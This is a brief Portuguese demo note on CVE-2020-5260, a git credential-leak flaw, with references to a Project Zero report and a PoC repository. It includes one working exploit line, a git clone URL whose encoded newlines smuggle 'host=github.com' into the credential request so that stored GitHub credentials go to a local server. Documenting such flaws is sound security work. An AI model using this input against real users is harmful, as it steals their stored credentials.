CVE-2020-5260
Registro de demonstração do CVE-2020-5260
- Ao executar comandos como "git clone https://example.com", o git solicita o armazenamento das credenciais do host "example.com" usando o protocolo "https" e, quando o lado remoto solicita autenticação, anexa as credenciais retornadas à solicitação enviada
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https

Referências:
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://github.com/brompwnie/cve-2020-5260